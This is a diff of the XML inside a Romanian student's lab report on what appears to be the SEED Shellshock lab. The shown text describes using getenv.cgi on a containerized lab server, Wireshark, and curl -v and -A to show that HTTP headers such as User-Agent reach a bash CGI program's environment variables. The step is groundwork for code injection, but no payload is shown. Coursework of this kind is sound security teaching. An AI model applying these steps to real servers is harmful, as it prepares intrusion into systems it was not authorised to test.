--- a/L07/Birlutiu_Claudiu_L07/SablonRaportL07.docx
+++ b/L07/Birlutiu_Claudiu_L07/SablonRaportL07.docx
@@ -1085,235 +1085,319 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>Se vor trimite dste spre bash într-un program GGI bazat pe bash, prin variabile de mediu</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">se folosește programul </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>getenv.cgi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> de pe serverul containerizat pentru indentificarea datelor de la </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>utilizator</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ce pot ajunge în variabilele de mediu ale programului</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>în</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> acest program exista o comanda care în momentul în care este executata se vor tipari variabile (continutulu lor) de mediu din procesul curent</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>am instalat extensia Http Header Live și am introdus în bara de search următorul link prin care se va executa scriptul din getenv.cgi din container -&gt; se vor afisa toate variabilele procesului curent</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="8">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>114300</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>124460</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5715000" cy="4086860"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="7" name="Image7" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="7" name="Image7" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5715000" cy="4086860"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="9">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>19050</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>193040</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5943600" cy="904240"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="8" name="Image8" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="8" name="Image8" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="904240"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>m urmărit de asemenea și în wireshark cererea spre server</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="10">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5943600" cy="4362450"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="9" name="Image9" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="9" name="Image9" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="4362450"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
@@ -1384,6 +1468,1259 @@
           <w:iCs/>
         </w:rPr>
         <w:t>curl</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Aceasta comanda </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>curl</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> se poate folosi pentru setarea variabilelor de meiu la valori arbitrare deaorece prin aceasta comanda putem controla majoriatea campurilor dintr-o solicitare http</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">verificare opțiuni pentru metoda </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>curl</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>v → va tipari antetul cererii http</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">curl -v </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId13">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="InternetLink"/>
+          </w:rPr>
+          <w:t>http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="4"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>va tipari si antetul cererii http la accesul spre server</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="11">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>-86360</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>56515</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5943600" cy="4540250"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="10" name="Image10" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="10" name="Image10" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="4540250"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A -&gt;   va permite specificarea unui șir de caractere pentru a fi trimis ca șir User-Agent (un șir de caractere care identifică browserul sau alt client care face cererea către serverul web) în antetul cererii </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">curl -A "BirlutiuAgent" -v </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId15">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="InternetLink"/>
+            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+          </w:rPr>
+          <w:t>http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="4"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>se va seta user agent la BitlutiuAgent</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:ind w:left="2160" w:hanging="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="12">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="4800600" cy="1169670"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="11" name="Image11" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="11" name="Image11" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4800600" cy="1169670"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
